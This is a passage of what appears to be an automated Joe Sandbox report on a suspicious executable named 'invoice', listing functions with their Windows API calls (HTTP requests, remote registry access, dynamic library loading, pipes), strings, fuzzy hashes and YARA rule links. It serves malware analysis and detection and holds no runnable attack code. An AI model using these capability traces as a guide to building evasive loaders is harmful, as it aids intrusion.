                        • String ID: 0
                        • API String ID: 4152858687-4108050209
                        • Opcode ID: eff2cf818f33c5aacdde0de9b8935ea6515509cb3b2a7139529cd28bff86e7cc
                        • Instruction ID: e8e9f34ec69e0cd463eab9372f194470b18693136466de9c8cebcbd446f281b5
                        • Opcode Fuzzy Hash: eff2cf818f33c5aacdde0de9b8935ea6515509cb3b2a7139529cd28bff86e7cc
                        • Instruction Fuzzy Hash: C651C171A083819FD7A59F2ADC4566BB7FCEF85320F040A2DF895E6190EB64CD00A792
                        Function 00FDD87B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDD8E3
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FDD919
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FDD92A
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FDD9AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: 2f04515c78d8bf84cefe53f2c75d041269d5e2f213bd84ddbce20dfb4f556687
                        • Instruction ID: 1ef283a5f109c949c94afc5c1c21b7dd29e8dd741a40583611b7fc3771b922cb
                        • Opcode Fuzzy Hash: 2f04515c78d8bf84cefe53f2c75d041269d5e2f213bd84ddbce20dfb4f556687
                        • Instruction Fuzzy Hash: 8D41B2B2600204DFDB15CF51C8C4A9A7BBAEF45314F1980AAEC059F345D7B6DD40EBA1
                        Function 00FE2A4B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FE2AB8
                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FE2AD4
                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00FE2B1A
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01045890,00000000), ref: 00FE2B63
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem_memset
                        • String ID: 0
                        • API String ID: 1173514356-4108050209
                        • Opcode ID: 75a2748bb678d5e0f917cab47c90a08d082eab6f796ff24866f3c7fd36766f8f
                        • Instruction ID: 3bc209448ed6bb24e4fd9e13fd699f7f71692e660e9f408d5eaf5b1d033da8f6
                        • Opcode Fuzzy Hash: 75a2748bb678d5e0f917cab47c90a08d082eab6f796ff24866f3c7fd36766f8f
                        • Instruction Fuzzy Hash: D941CE706043829FD724DF25CC85B2ABBEDAF84320F10462DF9A597292E774E904DB62
                        Function 00FFD8B9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00FFD8D9
                          • Part of subcall function 00F879AB: _memmove.LIBCMT ref: 00F879F9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharLower_memmove
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 3425801089-567219261
                        • Opcode ID: 3612cb6a5cb5b8464b7bf8b9db557b109aa89625f01a1b343e9e173e424cf8ee
                        • Instruction ID: 82d85abc0e3e8652e384ca64dfd368970c7e9cfde9a513c6eac2fb01b9721a6e
                        • Opcode Fuzzy Hash: 3612cb6a5cb5b8464b7bf8b9db557b109aa89625f01a1b343e9e173e424cf8ee
                        • Instruction Fuzzy Hash: B031D0B0900609ABCF10FF94CC909FEB3B9FF45724B10861AE9A5972E1CB75E905DB80
                        Function 00FD9152 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FD91D6
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FD91E9
                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FD9219
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$_memmove$ClassName
                        • String ID: ComboBox$ListBox
                        • API String ID: 365058703-1403004172
                        • Opcode ID: abf91c69dc773fb3fce3277f138171b4b91aaa99ba1f79b91a2648f1e1ab52b3
                        • Instruction ID: 7a8ab2c483f6141a51a5f16f19c8a690645ccc4ab0d9d8d115fafb9f63afe4af
                        • Opcode Fuzzy Hash: abf91c69dc773fb3fce3277f138171b4b91aaa99ba1f79b91a2648f1e1ab52b3
                        • Instruction Fuzzy Hash: 6321F0729042047BDB24ABB1DC859FEB769DF45360B28421AF825A72E0DB79490AB710
                        Function 00FF1943 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FF1962
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF1988
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FF19B8
                        • InternetCloseHandle.WININET(00000000), ref: 00FF19FF
                          • Part of subcall function 00FF2599: GetLastError.KERNEL32(?,?,00FF192D,00000000,00000000,00000001), ref: 00FF25AE
                          • Part of subcall function 00FF2599: SetEvent.KERNEL32(?,?,00FF192D,00000000,00000000,00000001), ref: 00FF25C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 3113390036-3916222277
                        • Opcode ID: e767a391cd386d0f43fb600bc1b3178c14e66ec1ff94b03b80aa6c357efa1cf1
                        • Instruction ID: 6e12025ca4a4bcc189cdf0726ab505d06ef20f31d5137e4d3002a73beac1d377
                        • Opcode Fuzzy Hash: e767a391cd386d0f43fb600bc1b3178c14e66ec1ff94b03b80aa6c357efa1cf1
                        • Instruction Fuzzy Hash: B621ACB250020DBFEB229B60DC95EBF77ACFF48754F10011AF605D6210EAA99E05A7A1
                        Function 01006419 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01006493
                        • LoadLibraryW.KERNEL32(?), ref: 0100649A
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 010064AF
                        • DestroyWindow.USER32(?), ref: 010064B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                        • String ID: SysAnimate32
                        • API String ID: 4146253029-1011021900
                        • Opcode ID: a0ff72039b54567a91bfc418c34b914830537cdfa5355181c219cf512ab88bf1
                        • Instruction ID: 7ef7deef009b9d7005d6bf31fc68948102aa72b4e734ef13a6b784a830a17b61
                        • Opcode Fuzzy Hash: a0ff72039b54567a91bfc418c34b914830537cdfa5355181c219cf512ab88bf1
                        • Instruction Fuzzy Hash: 6E21C271600205ABFF624E68DC80EBB37EFEF48364F528658FA90921D1CB36C8619760
                        Function 00FE6E45 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 00FE6E65
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FE6E98
                        • GetStdHandle.KERNEL32(0000000C), ref: 00FE6EAA
                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FE6EE4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        • API String ID: 4209266947-2873401336
                        • Opcode ID: 79a015593d48efd7095aebbb79afe188180bba16c6049d2a7ba90d4b0fa2c3ed
                        • Instruction ID: 4ef047043bfd2b5cd1c6dc1cad018027fc8e3601dfe63c5db22ca951ffb07bcd
                        • Opcode Fuzzy Hash: 79a015593d48efd7095aebbb79afe188180bba16c6049d2a7ba90d4b0fa2c3ed
                        • Instruction Fuzzy Hash: C5217479A0024AABDB309F2ADC05A9A7BF5BF647B0F204619FCA0D72D0D7719850EB54
                        Function 00FE6F13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 00FE6F32
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FE6F64
                        • GetStdHandle.KERNEL32(000000F6), ref: 00FE6F75
                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FE6FAF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        • API String ID: 4209266947-2873401336
                        • Opcode ID: 19947b5734f643d2005a7803655dd1ff156a43cc3d8129757feb959c4e34369d
                        • Instruction ID: 069a46a35c526edf552e4fc7ec258ab686127893ec9d250783f0b70c9be16c80
                        • Opcode Fuzzy Hash: 19947b5734f643d2005a7803655dd1ff156a43cc3d8129757feb959c4e34369d
                        • Instruction Fuzzy Hash: 2D21B671A043899BDB309F6AAC04A9A77F9AF653B0F200659FCF0D72D0E7709850A750
                        Function 00FEACCA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 00FEACDE
                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FEAD32
                        • __swprintf.LIBCMT ref: 00FEAD4B
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0100F910), ref: 00FEAD89
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu
                        • API String ID: 3164766367-685833217
                        • Opcode ID: b3450c6673c1267cccd13db8f947733651878805d1025f8a0fae6fc6b8eb52a3
                        • Instruction ID: 83ee121df118c34cad08c2215b64fd527385b075431ad228cf6658ed89f6b263
                        • Opcode Fuzzy Hash: b3450c6673c1267cccd13db8f947733651878805d1025f8a0fae6fc6b8eb52a3
                        • Instruction Fuzzy Hash: CB214135A00109AFCB20EF65CD85DEE77B8EF89704B044069F505EB251DB75EA41EB61
                        Function 00FDA30F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                          • Part of subcall function 00FDA15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FDA179
                          • Part of subcall function 00FDA15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDA18C
                          • Part of subcall function 00FDA15C: GetCurrentThreadId.KERNEL32 ref: 00FDA193
                          • Part of subcall function 00FDA15C: AttachThreadInput.USER32(00000000), ref: 00FDA19A
                        • GetFocus.USER32 ref: 00FDA334
                          • Part of subcall function 00FDA1A5: GetParent.USER32(?), ref: 00FDA1B3
                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDA37D
                        • EnumChildWindows.USER32(?,00FDA3F5), ref: 00FDA3A5
                        • __swprintf.LIBCMT ref: 00FDA3BF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                        • String ID: %s%d
                        • API String ID: 1941087503-1110647743
                        • Opcode ID: 8669b98f8e9f30c5db3c4d89a6e546f73e875e1f46bfeb567d8e20320a32e8fe
                        • Instruction ID: 1f6e845bb97af2e0c1f111576d6b34e2bd5596b6e64668258d1d08c21576997c
                        • Opcode Fuzzy Hash: 8669b98f8e9f30c5db3c4d89a6e546f73e875e1f46bfeb567d8e20320a32e8fe
                        • Instruction Fuzzy Hash: DD11B7715003057BDF217F70DC85FEA377EAF45710F044066B9489A242CA795946AB75
                        Function 00FFEC69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FFED1B
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FFED4B
                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00FFEE7E
                        • CloseHandle.KERNEL32(?), ref: 00FFEEFF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                        • String ID:
                        • API String ID: 2364364464-0
                        • Opcode ID: 18e5da5a91bf66a92810a53f838b9461be6a1f37bf589ee9976f161c279880ac
                        • Instruction ID: f54983dceeda235eb1b24975af4e4033f4f965f9b6028dd364a4a4c95ab36b1f
                        • Opcode Fuzzy Hash: 18e5da5a91bf66a92810a53f838b9461be6a1f37bf589ee9976f161c279880ac
                        • Instruction Fuzzy Hash: D38193716043019FD720EF24DC86B6AB7E5AF48720F04881DFA96DB3A2DBB5AC019B41
                        Function 00FA558D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                        • Instruction ID: 5c3d105b8fecf1eca611fea2a2146673a1de65df0c075ab59c9f3ae245301ce2
                        • Opcode Fuzzy Hash: 17c9c7776e299596ed796557eca7f8bd29831e9b0e98da48d3161094909ff33f
                        • Instruction Fuzzy Hash: 7E51C3B1E00B09DFDF248FA9D88066E77B6EF42B34F248729F825962D0D7749D50AB40
                        Function 010000C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 01000EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFE38,?,?), ref: 01000EBC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000188
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010001C7
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0100020E
                        • RegCloseKey.ADVAPI32(?,?), ref: 0100023A
                        • RegCloseKey.ADVAPI32(00000000), ref: 01000247
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                        • String ID:
                        • API String ID: 3440857362-0
                        • Opcode ID: 024bc0f7fcdc5e41c6d17f3162f8d97e73d01d39c888f022ef9d07c402bebbc9
                        • Instruction ID: 9aeb371baaf213ccd5714976e9054dacb4e43b8471362f2a52dc190b42d5506b
                        • Opcode Fuzzy Hash: 024bc0f7fcdc5e41c6d17f3162f8d97e73d01d39c888f022ef9d07c402bebbc9
                        • Instruction Fuzzy Hash: F0515631208201AFE715EBA8DC85FAEB7E8FF88744F04891DB59587291DB35E904DB52
                        Function 00FFD9DC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FFDA3B
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00FFDABE
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FFDADA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00FFDB1B
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FFDB35
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE793F,?,?,00000000), ref: 00F85B8C
                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE793F,?,?,00000000,?,?), ref: 00F85BB0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                        • String ID:
                        • API String ID: 327935632-0
                        • Opcode ID: 56b0a5bdef47135b63dc1cfcf796e50905ac2938b42a97e005897d642bac4424
                        • Instruction ID: 479667489d67cdea2f0adcc494645ca796febaf3ab41ef4b99e5cc8a01b2ca52
                        • Opcode Fuzzy Hash: 56b0a5bdef47135b63dc1cfcf796e50905ac2938b42a97e005897d642bac4424
                        • Instruction Fuzzy Hash: A0515A35A042099FCB11EFA8C8849EDB7F5FF49320B088055E915AB322DB39ED45EF81
                        Function 00FEE5FD Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FEE6AB
                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FEE6D4
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FEE713
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FEE738
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FEE740
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                        • String ID:
                        • API String ID: 1389676194-0
